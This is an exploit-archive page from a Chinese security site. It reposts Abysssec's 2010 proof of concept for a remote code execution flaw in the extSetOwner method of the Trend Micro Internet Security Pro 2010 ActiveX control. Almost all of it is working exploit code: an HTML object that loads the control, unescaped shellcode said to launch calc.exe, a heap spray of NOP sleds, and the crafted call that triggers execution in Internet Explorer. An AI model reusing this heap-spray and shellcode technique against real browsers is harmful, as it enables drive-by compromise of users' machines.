首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-03  

<!--
 __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <  Day 3 (Binary Analysis)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/


  Title            :  Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code  Execution
  Version          :  UfPBCtrl.DLL  17.50.0.1366 (XP SP3)
  Analysis         :  http://www.abysssec.com
  Vendor           :  http://www.trendmicro.com
  Impact           :  Critical
  Contact          :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter          :  @abysssec
 
  http://www.exploit-db.com/trend-micro-internet-security-pro-2010-activex-extsetowner-remote-code-execution/

  SHELLCODE CALC.EXE TESTED ON XPSP3_IE_7
-->
<object ID='target' classid='clsid:15DBC3F9-9F0A-472E-8061-043D9CEC52F0'>

</object>
<script> 
  shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
                    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
                    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
                    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
                    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
                    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
                    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
                    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
                     
     nops=unescape('%u9090%u9090');
     headersize =20;
     slackspace= headersize + shellcode.length;
     while(nops.length< slackspace) nops+= nops;
     fillblock= nops.substring(0, slackspace);
     block= nops.substring(0, nops.length- slackspace);
     while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;
     memory=new Array();
     for( counter=0; counter<200; counter++) memory[counter]= block + shellcode;    
  target.extSetOwner(unescape('%ua5de%u3da6'));                 //mshtml.dll [0x3DA6A5DE] = 0A0A0A06       
</script>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Intel Video Codecs v5 Remote D
·BlueCMS getip()注射漏洞
·FFDshow SEH Exception leading
·vBulletin 4.0.6 - Danial Of Se
·Movie Maker Remote Code Execut
·Backdoor password in Accton-ba
·mBlogger 1.0.04 (addcomment.ph
·Shellcode Checksum Routine
·VLC Media Player < 1.1.4 (.xsp
·Apple QuickTime FlashPix Numbe
·A-Blog v2.0 (sources/search.ph
·Novell Netware v6.5 OpenSSH Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved